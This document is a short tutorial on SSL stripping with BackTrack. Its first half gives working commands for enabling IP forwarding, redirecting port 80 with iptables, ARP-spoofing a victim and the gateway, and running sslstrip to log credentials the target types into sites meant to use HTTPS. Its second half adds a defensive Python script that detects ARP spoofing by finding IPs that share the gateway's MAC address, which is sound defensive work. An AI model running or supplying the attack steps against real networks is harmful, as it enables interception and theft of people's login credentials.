SSL Strip using Backtrack
SSL Strip is a tool that hijacks HTTP traffic on a network by replacing all HTTPS/SSL links with HTTP ones. Once SSL Strip is set up, all of the victim's traffic is routed through the attacker, and HTTP traffic is redirected to the attacker's machine. The attacker is then able to obtain all logon information by sniffing the plaintext HTTP protocol.
How to:
1. Set up IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
2. Set up Port redirection using iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1337
3. Start ARP MITM
arpspoof -i eth0 -t VICTIMIP GATEWAY
4. Start SSL Strip Tool
sslstrip -l 1337 -w log.txt
5. Wait until the target logs in to a website that is supposed to use HTTPS/SSL
6. Check log.txt for captured information
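Seen from the victim's side, step 3 leaves a visible trace: the gateway's IP resolves to the same MAC address as another host on the LAN. The following check is an added example, not part of the original post; it parses `ip neigh show` output and flags that condition. The sample table, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` output from a client on 192.168.1.0/24.
# The gateway (.1) and another host (.66) claim the same MAC, which is
# what the client's cache looks like while step 3 is running against it.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.20 dev eth0 lladdr 52:54:00:12:34:56 STALE
192.168.1.66 dev eth0 lladdr 08:00:27:AA:BB:CC REACHABLE
192.168.1.30 dev eth0  FAILED
"""

LINE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9A-Fa-f:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that have a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries carry no lladdr and are skipped
            table[m.group(1)] = m.group(3).lower()
    return table

def shared_macs(table):
    """Return {mac: [ips]} for every MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_conflicts(table, gateway_ip):
    """Return other IPs that share the gateway's MAC (empty list if none)."""
    mac = table.get(gateway_ip)
    if mac is None:
        return []
    return sorted(ip for ip, m in table.items() if m == mac and ip != gateway_ip)

if __name__ == "__main__":
    table = parse_neigh(SAMPLE_NEIGH)
    for mac, ips in shared_macs(table).items():
        print(f"ALERT: {mac} is claimed by {', '.join(ips)}")
    print("gateway conflicts:", gateway_conflicts(table, "192.168.1.1"))
```

A shared MAC can also be legitimate (proxy ARP, one interface holding several addresses), so treat a hit as a prompt to compare against the gateway's known MAC. The check only fires when the second host's real IP is also in the cache.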